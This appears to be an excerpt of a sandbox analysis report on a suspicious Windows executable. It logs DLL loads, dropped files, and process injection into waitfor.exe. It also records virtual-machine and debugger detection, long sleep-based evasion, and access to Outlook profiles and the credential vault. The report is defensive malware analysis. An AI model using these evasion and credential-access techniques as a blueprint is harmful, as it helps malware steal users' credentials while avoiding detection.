          Source: C:\Users\user\Desktop\02Eh1ah35H.exe Section loaded: windows.storage.dll
          Source: C:\Users\user\Desktop\02Eh1ah35H.exe Section loaded: wldp.dll
          Source: C:\Users\user\Desktop\02Eh1ah35H.exe Section loaded: profapi.dll
          Source: C:\Users\user\Desktop\02Eh1ah35H.exe Section loaded: kernel.appcore.dll
          Source: C:\Users\user\Desktop\02Eh1ah35H.exe Section loaded: ondemandconnroutehelper.dll
          Source: C:\Users\user\Desktop\02Eh1ah35H.exe Section loaded: mswsock.dll
          Source: C:\Users\user\Desktop\02Eh1ah35H.exe Section loaded: iphlpapi.dll
          Source: C:\Users\user\Desktop\02Eh1ah35H.exe Section loaded: winnsi.dll
          Source: C:\Users\user\Desktop\02Eh1ah35H.exe Section loaded: urlmon.dll
          Source: C:\Users\user\Desktop\02Eh1ah35H.exe Section loaded: srvcli.dll
          Source: C:\Users\user\Desktop\02Eh1ah35H.exe Section loaded: dnsapi.dll
          Source: C:\Users\user\Desktop\02Eh1ah35H.exe Section loaded: rasadhlp.dll
          Source: C:\Users\user\Desktop\02Eh1ah35H.exe Section loaded: fwpuclnt.dll
          Source: C:\Users\user\Desktop\02Eh1ah35H.exe Section loaded: schannel.dll
          Source: C:\Users\user\Desktop\02Eh1ah35H.exe Section loaded: mskeyprotect.dll
          Source: C:\Users\user\Desktop\02Eh1ah35H.exe Section loaded: ntasn1.dll
          Source: C:\Users\user\Desktop\02Eh1ah35H.exe Section loaded: msasn1.dll
          Source: C:\Users\user\Desktop\02Eh1ah35H.exe Section loaded: dpapi.dll
          Source: C:\Users\user\Desktop\02Eh1ah35H.exe Section loaded: cryptsp.dll
          Source: C:\Users\user\Desktop\02Eh1ah35H.exe Section loaded: rsaenh.dll
          Source: C:\Users\user\Desktop\02Eh1ah35H.exe Section loaded: cryptbase.dll
          Source: C:\Users\user\Desktop\02Eh1ah35H.exe Section loaded: gpapi.dll
          Source: C:\Users\user\Desktop\02Eh1ah35H.exe Section loaded: ncrypt.dll
          Source: C:\Users\user\Desktop\02Eh1ah35H.exe Section loaded: ncryptsslp.dll
          Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe Section loaded: mswsock.dll
          Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe Section loaded: dnsapi.dll
          Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe Section loaded: iphlpapi.dll
          Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe Section loaded: rasadhlp.dll
          Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe Section loaded: fwpuclnt.dll
          Source: C:\Windows\SysWOW64\waitfor.exe Section loaded: mpr.dll
          Source: C:\Windows\SysWOW64\waitfor.exe Section loaded: version.dll
          Source: C:\Windows\SysWOW64\waitfor.exe Section loaded: srvcli.dll
          Source: C:\Windows\SysWOW64\waitfor.exe Section loaded: netutils.dll
          Source: C:\Windows\SysWOW64\waitfor.exe Section loaded: sspicli.dll
          Source: C:\Windows\SysWOW64\waitfor.exe Section loaded: edgegdi.dll
          Source: C:\Windows\SysWOW64\waitfor.exe Section loaded: wininet.dll
          Source: C:\Windows\SysWOW64\waitfor.exe Section loaded: kernel.appcore.dll
          Source: C:\Windows\SysWOW64\waitfor.exe Section loaded: uxtheme.dll
          Source: C:\Windows\SysWOW64\waitfor.exe Section loaded: ieframe.dll
          Source: C:\Windows\SysWOW64\waitfor.exe Section loaded: iertutil.dll
          Source: C:\Windows\SysWOW64\waitfor.exe Section loaded: netapi32.dll
          Source: C:\Windows\SysWOW64\waitfor.exe Section loaded: userenv.dll
          Source: C:\Windows\SysWOW64\waitfor.exe Section loaded: winhttp.dll
          Source: C:\Windows\SysWOW64\waitfor.exe Section loaded: wkscli.dll
          Source: C:\Windows\SysWOW64\waitfor.exe Section loaded: windows.storage.dll
          Source: C:\Windows\SysWOW64\waitfor.exe Section loaded: wldp.dll
          Source: C:\Windows\SysWOW64\waitfor.exe Section loaded: profapi.dll
          Source: C:\Windows\SysWOW64\waitfor.exe Section loaded: secur32.dll
          Source: C:\Windows\SysWOW64\waitfor.exe Section loaded: mlang.dll
          Source: C:\Windows\SysWOW64\waitfor.exe Section loaded: propsys.dll
          Source: C:\Windows\SysWOW64\waitfor.exe Section loaded: winsqlite3.dll
          Source: C:\Windows\SysWOW64\waitfor.exe Section loaded: vaultcli.dll
          Source: C:\Windows\SysWOW64\waitfor.exe Section loaded: wintypes.dll
          Source: C:\Windows\SysWOW64\waitfor.exe Section loaded: dpapi.dll
          Source: C:\Windows\SysWOW64\waitfor.exe Section loaded: cryptbase.dll
          Source: C:\Users\user\Desktop\02Eh1ah35H.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
          Source: C:\Windows\SysWOW64\waitfor.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
          Source: 02Eh1ah35H.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
          Source: Binary string: waitfor.pdbGCTL source: 02Eh1ah35H.exe, 00000002.00000003.28513869083.0000000003047000.00000004.00000020.00020000.00000000.sdmp, 02Eh1ah35H.exe, 00000002.00000002.28562483548.0000000003046000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: mshtml.pdb source: 02Eh1ah35H.exe, 00000002.00000001.28252790444.0000000000649000.00000020.00000001.01000000.00000005.sdmp
          Source: Binary string: waitfor.pdb source: 02Eh1ah35H.exe, 00000002.00000003.28513869083.0000000003047000.00000004.00000020.00020000.00000000.sdmp, 02Eh1ah35H.exe, 00000002.00000002.28562483548.0000000003046000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdbUGP source: 02Eh1ah35H.exe, 00000002.00000003.28460973128.0000000033156000.00000004.00000020.00020000.00000000.sdmp, 02Eh1ah35H.exe, 00000002.00000002.28574257270.0000000033300000.00000040.00001000.00020000.00000000.sdmp, 02Eh1ah35H.exe, 00000002.00000003.28457645000.0000000032FAC000.00000004.00000020.00020000.00000000.sdmp, 02Eh1ah35H.exe, 00000002.00000002.28574257270.000000003342D000.00000040.00001000.00020000.00000000.sdmp, waitfor.exe, 00000004.00000002.33482540954.00000000052BD000.00000040.00001000.00020000.00000000.sdmp, waitfor.exe, 00000004.00000003.28555368078.0000000004E39000.00000004.00000020.00020000.00000000.sdmp, waitfor.exe, 00000004.00000002.33482540954.0000000005190000.00000040.00001000.00020000.00000000.sdmp, waitfor.exe, 00000004.00000003.28559066877.0000000004FEA000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: 02Eh1ah35H.exe, 02Eh1ah35H.exe, 00000002.00000003.28460973128.0000000033156000.00000004.00000020.00020000.00000000.sdmp, 02Eh1ah35H.exe, 00000002.00000002.28574257270.0000000033300000.00000040.00001000.00020000.00000000.sdmp, 02Eh1ah35H.exe, 00000002.00000003.28457645000.0000000032FAC000.00000004.00000020.00020000.00000000.sdmp, 02Eh1ah35H.exe, 00000002.00000002.28574257270.000000003342D000.00000040.00001000.00020000.00000000.sdmp, waitfor.exe, waitfor.exe, 00000004.00000002.33482540954.00000000052BD000.00000040.00001000.00020000.00000000.sdmp, waitfor.exe, 00000004.00000003.28555368078.0000000004E39000.00000004.00000020.00020000.00000000.sdmp, waitfor.exe, 00000004.00000002.33482540954.0000000005190000.00000040.00001000.00020000.00000000.sdmp, waitfor.exe, 00000004.00000003.28559066877.0000000004FEA000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: mshtml.pdbUGP source: 02Eh1ah35H.exe, 00000002.00000001.28252790444.0000000000649000.00000020.00000001.01000000.00000005.sdmp

          Data Obfuscation

          Source: Yara match File source: 00000000.00000002.28256040548.0000000004AC5000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: C:\Users\user\Desktop\02Eh1ah35H.exe Code function: 0_2_6FDF1B5F GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW, 0_2_6FDF1B5F
          Source: C:\Users\user\Desktop\02Eh1ah35H.exe Code function: 2_2_333021AD pushad ; retf 0004h 2_2_3330223F
          Source: C:\Users\user\Desktop\02Eh1ah35H.exe Code function: 2_2_333097A1 push es; iretd 2_2_333097A8
          Source: C:\Users\user\Desktop\02Eh1ah35H.exe Code function: 2_2_333308CD push ecx; mov dword ptr [esp], ecx 2_2_333308D6
          Source: C:\Windows\SysWOW64\waitfor.exe Code function: 4_2_051C08CD push ecx; mov dword ptr [esp], ecx 4_2_051C08D6
          Source: C:\Windows\SysWOW64\waitfor.exe Code function: 4_2_050844B3 push esp; retf 4_2_050844B5
          Source: C:\Windows\SysWOW64\waitfor.exe Code function: 4_2_05084F98 push ss; iretd 4_2_05085088
          Source: C:\Windows\SysWOW64\waitfor.exe Code function: 4_2_05085075 push ss; iretd 4_2_05085088
          Source: C:\Windows\SysWOW64\waitfor.exe Code function: 4_2_050868A7 pushad ; retf 4_2_050868A8
          Source: C:\Windows\SysWOW64\waitfor.exe Code function: 4_2_050868C4 pushfd ; ret 4_2_050868E8
          Source: C:\Windows\SysWOW64\waitfor.exe Code function: 4_2_05095242 push eax; ret 4_2_05095244
          Source: C:\Windows\SysWOW64\waitfor.exe Code function: 4_2_05086252 pushfd ; retf 4_2_0508625D
          Source: C:\Users\user\Desktop\02Eh1ah35H.exe File created: C:\Users\user\AppData\Local\Temp\nsbF672.tmp\System.dll
          Source: C:\Users\user\Desktop\02Eh1ah35H.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\inspires
          Source: C:\Users\user\Desktop\02Eh1ah35H.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\inspires\Heteroscian.Gen
          Source: C:\Users\user\Desktop\02Eh1ah35H.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\inspires\Sulfoforbindelserne.chl
          Source: C:\Users\user\Desktop\02Eh1ah35H.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\inspires\Causer
          Source: C:\Users\user\Desktop\02Eh1ah35H.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\inspires\Causer\Umpiress240.biv
          Source: C:\Users\user\Desktop\02Eh1ah35H.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\inspires\Causer\potmaker.sti
          Source: C:\Users\user\Desktop\02Eh1ah35H.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\waitfor.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

          Malware Analysis System Evasion

          Source: C:\Users\user\Desktop\02Eh1ah35H.exe API/Special instruction interceptor: Address: 507CABA
          Source: C:\Users\user\Desktop\02Eh1ah35H.exe API/Special instruction interceptor: Address: 1CDCABA
          Source: C:\Users\user\Desktop\02Eh1ah35H.exe API/Special instruction interceptor: Address: 7FF9BAA10594
          Source: C:\Users\user\Desktop\02Eh1ah35H.exe API/Special instruction interceptor: Address: 7FF9BAA0FF74
          Source: C:\Users\user\Desktop\02Eh1ah35H.exe API/Special instruction interceptor: Address: 7FF9BAA0D6C4
          Source: C:\Users\user\Desktop\02Eh1ah35H.exe API/Special instruction interceptor: Address: 7FF9BAA0D864
          Source: C:\Windows\SysWOW64\waitfor.exe API/Special instruction interceptor: Address: 7FF9BAA0D144
          Source: C:\Windows\SysWOW64\waitfor.exe API/Special instruction interceptor: Address: 7FF9BAA10594
          Source: C:\Windows\SysWOW64\waitfor.exe API/Special instruction interceptor: Address: 7FF9BAA0D764
          Source: C:\Windows\SysWOW64\waitfor.exe API/Special instruction interceptor: Address: 7FF9BAA0D324
          Source: C:\Windows\SysWOW64\waitfor.exe API/Special instruction interceptor: Address: 7FF9BAA0D364
          Source: C:\Windows\SysWOW64\waitfor.exe API/Special instruction interceptor: Address: 7FF9BAA0D004
          Source: C:\Windows\SysWOW64\waitfor.exe API/Special instruction interceptor: Address: 7FF9BAA0FF74
          Source: C:\Windows\SysWOW64\waitfor.exe API/Special instruction interceptor: Address: 7FF9BAA0D6C4
          Source: C:\Windows\SysWOW64\waitfor.exe API/Special instruction interceptor: Address: 7FF9BAA0D864
          Source: C:\Windows\SysWOW64\waitfor.exe API/Special instruction interceptor: Address: 7FF9BAA0D604
          Source: C:\Users\user\Desktop\02Eh1ah35H.exe File opened: C:\Program Files\Qemu-ga\qemu-ga.exe
          Source: C:\Users\user\Desktop\02Eh1ah35H.exe File opened: C:\Program Files\qga\qga.exe
          Source: 02Eh1ah35H.exe, 00000000.00000002.28255474172.0000000002DD0000.00000004.00001000.00020000.00000000.sdmp, 02Eh1ah35H.exe, 00000002.00000002.28562936452.0000000003120000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: QC:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
          Source: 02Eh1ah35H.exe, 00000000.00000002.28254430063.0000000000B07000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE0
          Source: C:\Users\user\Desktop\02Eh1ah35H.exe Code function: 2_2_33371763 rdtsc 2_2_33371763
          Source: C:\Windows\SysWOW64\waitfor.exe Window / User API: threadDelayed 9265
          Source: C:\Users\user\Desktop\02Eh1ah35H.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsbF672.tmp\System.dll
          Source: C:\Users\user\Desktop\02Eh1ah35H.exe API coverage: 0.4 %
          Source: C:\Windows\SysWOW64\waitfor.exe API coverage: 1.4 %
          Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe TID: 2088 Thread sleep time: -35000s >= -30000s
          Source: C:\Windows\SysWOW64\waitfor.exe TID: 5564 Thread sleep count: 121 > 30
          Source: C:\Windows\SysWOW64\waitfor.exe TID: 5564 Thread sleep time: -242000s >= -30000s
          Source: C:\Windows\SysWOW64\waitfor.exe TID: 5564 Thread sleep count: 9265 > 30
          Source: C:\Windows\SysWOW64\waitfor.exe TID: 5564 Thread sleep time: -18530000s >= -30000s
          Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe Last function: Thread delayed
          Source: C:\Windows\SysWOW64\waitfor.exe Last function: Thread delayed
          Source: C:\Users\user\Desktop\02Eh1ah35H.exe Code function: 0_2_0040674C FindFirstFileW,FindClose, 0_2_0040674C
          Source: C:\Users\user\Desktop\02Eh1ah35H.exe Code function: 0_2_00405B00 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose, 0_2_00405B00
          Source: C:\Users\user\Desktop\02Eh1ah35H.exe Code function: 0_2_00402902 FindFirstFileW, 0_2_00402902
          Source: 02Eh1ah35H.exe, 00000000.00000002.28260375838.0000000006129000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V Guest Shutdown Service
          Source: 02Eh1ah35H.exe, 00000000.00000002.28260375838.0000000006129000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V Remote Desktop Virtualization Service
          Source: 02Eh1ah35H.exe, 00000000.00000002.28260375838.0000000006129000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: vmicshutdown
          Source: 02Eh1ah35H.exe, 00000000.00000002.28260375838.0000000006129000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V Volume Shadow Copy Requestor
          Source: 02Eh1ah35H.exe, 00000000.00000002.28260375838.0000000006129000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V PowerShell Direct Service
          Source: 02Eh1ah35H.exe, 00000000.00000002.28260375838.0000000006129000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V Time Synchronization Service
          Source: 02Eh1ah35H.exe, 00000000.00000002.28260375838.0000000006129000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: vmicvss
          Source: 02Eh1ah35H.exe, 00000002.00000002.28562292473.0000000002FE7000.00000004.00000020.00020000.00000000.sdmp, 02Eh1ah35H.exe, 00000002.00000003.28458714616.0000000002FE7000.00000004.00000020.00020000.00000000.sdmp, 02Eh1ah35H.exe, 00000002.00000002.28561928458.0000000002FB5000.00000004.00000020.00020000.00000000.sdmp, 02Eh1ah35H.exe, 00000002.00000003.28458343135.0000000002FE7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
          Source: 02Eh1ah35H.exe, 00000000.00000002.28255474172.0000000002DD0000.00000004.00001000.00020000.00000000.sdmp, 02Eh1ah35H.exe, 00000002.00000002.28562936452.0000000003120000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: QC:\Program Files\Qemu-ga\qemu-ga.exe
          Source: 02Eh1ah35H.exe, 00000000.00000002.28260375838.0000000006129000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V Data Exchange Service
          Source: 02Eh1ah35H.exe, 00000000.00000002.28254430063.0000000000B07000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe0
          Source: 02Eh1ah35H.exe, 00000000.00000002.28260375838.0000000006129000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V Heartbeat Service
          Source: 02Eh1ah35H.exe, 00000000.00000002.28260375838.0000000006129000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V Guest Service Interface
          Source: 02Eh1ah35H.exe, 00000000.00000002.28260375838.0000000006129000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: vmicheartbeat
          Source: waitfor.exe, 00000004.00000002.33480610058.0000000003365000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000005.00000002.28906416171.0000027F83D77000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
          Source: C:\Users\user\Desktop\02Eh1ah35H.exe API call chain: ExitProcess graph end node graph_0-4305
          Source: C:\Users\user\Desktop\02Eh1ah35H.exe API call chain: ExitProcess graph end node graph_0-4458
          Source: C:\Windows\SysWOW64\waitfor.exe Process information queried: ProcessInformation
          Source: C:\Windows\SysWOW64\waitfor.exe Process queried: DebugPort
          Source: C:\Users\user\Desktop\02Eh1ah35H.exe Code function: 2_2_33371763 rdtsc 2_2_33371763
          Source: C:\Users\user\Desktop\02Eh1ah35H.exe Code function: 2_2_333734E0 NtCreateMutant,LdrInitializeThunk, 2_2_333734E0
          Source: C:\Users\user\Desktop\02Eh1ah35H.exe Code function: 0_2_6FDF1B5F GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW, 0_2_6FDF1B5F
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_3335510F mov eax, dword ptr fs:[00000030h]2_2_3335510F
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_3335510F mov eax, dword ptr fs:[00000030h]2_2_3335510F
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_3335510F mov eax, dword ptr fs:[00000030h]2_2_3335510F
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_3335510F mov eax, dword ptr fs:[00000030h]2_2_3335510F
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_3335510F mov eax, dword ptr fs:[00000030h]2_2_3335510F
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_3335510F mov eax, dword ptr fs:[00000030h]2_2_3335510F
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_3335510F mov eax, dword ptr fs:[00000030h]2_2_3335510F
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_3335510F mov eax, dword ptr fs:[00000030h]2_2_3335510F
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_3335510F mov eax, dword ptr fs:[00000030h]2_2_3335510F
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_3333510D mov eax, dword ptr fs:[00000030h]2_2_3333510D
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_3338717A mov eax, dword ptr fs:[00000030h]2_2_3338717A
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_3338717A mov eax, dword ptr fs:[00000030h]2_2_3338717A
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_33336179 mov eax, dword ptr fs:[00000030h]2_2_33336179
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_3336716D mov eax, dword ptr fs:[00000030h]2_2_3336716D
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_3336415F mov eax, dword ptr fs:[00000030h]2_2_3336415F
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_3332A147 mov eax, dword ptr fs:[00000030h]2_2_3332A147
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_3332A147 mov eax, dword ptr fs:[00000030h]2_2_3332A147
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_3332A147 mov eax, dword ptr fs:[00000030h]2_2_3332A147
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_333C314A mov eax, dword ptr fs:[00000030h]2_2_333C314A
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_333C314A mov eax, dword ptr fs:[00000030h]2_2_333C314A
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_333C314A mov eax, dword ptr fs:[00000030h]2_2_333C314A
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_333C314A mov eax, dword ptr fs:[00000030h]2_2_333C314A
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_333631BE mov eax, dword ptr fs:[00000030h]2_2_333631BE
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_333631BE mov eax, dword ptr fs:[00000030h]2_2_333631BE
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_333641BB mov ecx, dword ptr fs:[00000030h]2_2_333641BB
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_333641BB mov eax, dword ptr fs:[00000030h]2_2_333641BB
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_333641BB mov eax, dword ptr fs:[00000030h]2_2_333641BB
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_3336E1A4 mov eax, dword ptr fs:[00000030h]2_2_3336E1A4
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_3336E1A4 mov eax, dword ptr fs:[00000030h]2_2_3336E1A4
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_33359194 mov eax, dword ptr fs:[00000030h]2_2_33359194
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_33371190 mov eax, dword ptr fs:[00000030h]2_2_33371190
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_33371190 mov eax, dword ptr fs:[00000030h]2_2_33371190
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_33334180 mov eax, dword ptr fs:[00000030h]2_2_33334180
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_33334180 mov eax, dword ptr fs:[00000030h]2_2_33334180
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_33334180 mov eax, dword ptr fs:[00000030h]2_2_33334180
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_333291F0 mov eax, dword ptr fs:[00000030h]2_2_333291F0
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_333291F0 mov eax, dword ptr fs:[00000030h]2_2_333291F0
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_333401F1 mov eax, dword ptr fs:[00000030h]2_2_333401F1
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_333401F1 mov eax, dword ptr fs:[00000030h]2_2_333401F1
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_333401F1 mov eax, dword ptr fs:[00000030h]2_2_333401F1
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_3335F1F0 mov eax, dword ptr fs:[00000030h]2_2_3335F1F0
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_3335F1F0 mov eax, dword ptr fs:[00000030h]2_2_3335F1F0
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_3333A1E3 mov eax, dword ptr fs:[00000030h]2_2_3333A1E3
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_3333A1E3 mov eax, dword ptr fs:[00000030h]2_2_3333A1E3
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_3333A1E3 mov eax, dword ptr fs:[00000030h]2_2_3333A1E3
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_3333A1E3 mov eax, dword ptr fs:[00000030h]2_2_3333A1E3
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_3333A1E3 mov eax, dword ptr fs:[00000030h]2_2_3333A1E3
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_333F81EE mov eax, dword ptr fs:[00000030h]2_2_333F81EE
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_333F81EE mov eax, dword ptr fs:[00000030h]2_2_333F81EE
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_3335B1E0 mov eax, dword ptr fs:[00000030h]2_2_3335B1E0
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_3335B1E0 mov eax, dword ptr fs:[00000030h]2_2_3335B1E0
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_3335B1E0 mov eax, dword ptr fs:[00000030h]2_2_3335B1E0
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_3335B1E0 mov eax, dword ptr fs:[00000030h]2_2_3335B1E0
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_3335B1E0 mov eax, dword ptr fs:[00000030h]2_2_3335B1E0
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_3335B1E0 mov eax, dword ptr fs:[00000030h]2_2_3335B1E0
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_3335B1E0 mov eax, dword ptr fs:[00000030h]2_2_3335B1E0
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_333391E5 mov eax, dword ptr fs:[00000030h]2_2_333391E5
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_333391E5 mov eax, dword ptr fs:[00000030h]2_2_333391E5
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_333281EB mov eax, dword ptr fs:[00000030h]2_2_333281EB
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_333401C0 mov eax, dword ptr fs:[00000030h]2_2_333401C0
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_333401C0 mov eax, dword ptr fs:[00000030h]2_2_333401C0
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_333451C0 mov eax, dword ptr fs:[00000030h]2_2_333451C0
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_333451C0 mov eax, dword ptr fs:[00000030h]2_2_333451C0
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_333451C0 mov eax, dword ptr fs:[00000030h]2_2_333451C0
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_333451C0 mov eax, dword ptr fs:[00000030h]2_2_333451C0
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_334051B6 mov eax, dword ptr fs:[00000030h]2_2_334051B6
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_3340505B mov eax, dword ptr fs:[00000030h]2_2_3340505B
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_3332D02D mov eax, dword ptr fs:[00000030h]2_2_3332D02D
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_33372010 mov ecx, dword ptr fs:[00000030h]2_2_33372010
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_33355004 mov eax, dword ptr fs:[00000030h]2_2_33355004
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_33355004 mov ecx, dword ptr fs:[00000030h]2_2_33355004
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_33338009 mov eax, dword ptr fs:[00000030h]2_2_33338009
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_33337072 mov eax, dword ptr fs:[00000030h]2_2_33337072
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_33336074 mov eax, dword ptr fs:[00000030h]2_2_33336074
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_33336074 mov eax, dword ptr fs:[00000030h]2_2_33336074
          Source: C:\Users\user\Desktop\02Eh1ah35H.exeCode function: 2_2_333D9060 mov eax, dword ptr fs:[00000030h]2_2_333D9060
